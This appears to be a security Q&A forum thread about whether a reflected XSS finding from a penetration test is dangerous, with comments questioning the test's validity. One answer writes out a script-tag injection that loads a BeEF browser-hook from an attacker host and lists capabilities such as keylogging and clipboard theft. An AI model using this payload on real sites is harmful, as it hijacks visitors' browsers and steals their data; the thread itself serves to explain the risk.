I'm trying to understand why this might be problematic. I will, of course, ask the security company, but I'm also trying to evaluate them and see what the community has to say before they give me some roundabout answer.

A question, did they test the same site - and version - as the one you were browsing to? Not only did their exploit not show up - the versions of everything are different. PHP v5.3.2 vs. 5.3.1, everything else too... And the OS is not even the same!
–
AviD♦Dec 25 '10 at 23:05

Hi @AviD - good observation, they put their own test site which is different from what I used.
–
siliconpiDec 28 '10 at 8:10

3

Well duh, that seems kinda pointless, doncha think? Of course the results are gonna be different, that's why you don't see the exploit when you tried it on your system. I would go so far as to say the PT they did is nearly worthless... Clueless at best, negligent at worst.
–
AviD♦Dec 28 '10 at 9:00

2 Answers
2

For example if I inject the following bit of XSS into your code, all clients viewing this code with Javascript enabled would become a zombie in my BEEF-Framework(Browser Exploitation Framework):

<script src='http://10.0.0.100/beef/hook/beefmagic.js.php'></script>

Once anyone browse a page with that script inclusion in it, the framework automatically lets me know and basically lets me very easily choose between a toolbox of nasty stuff. To name some, which all can be set to autorun when new zombie registers:

Browser exploitation modules (even integrated with Metasploit)

Metasploit autopwn (yepp.. one click one pwn)

Port scanning LAN

Tor detection

Keylogging

See what the user sees functionality

Visited pages bruteforcing

Clipboard theft

Detect plugins

XSS can indeed be very dangerous!

UPDATE: In your specific situation it looks to me like your looking at a non persistent XSS vulnerability. This means that in order for this exploit to affect other users, the attackers would have to distribute the URL to unsuspecting victims for them to load it. This is however not an uncommon sight.

This is a classic XSS vulnerability. The danger here is that outside attacker could inject random code into the page. If this page displays in an elevated privilege context, it essentially is equal to the attacker having control over the user's browser when accessing this page, thus the attacker will be able to perform any action that the user is able to perform. For example, if it's an e-commerce site, the attacker would be able to simulate the user buying something, even if the user did not intend to buy anything. You can imagine how bad it can be.

Since there are many ways to direct somebody to load certain URL - both open ("click this link to get tons of free stuff!") and covert (hidden frames, etc.) - having such thing on the site is very dangerous.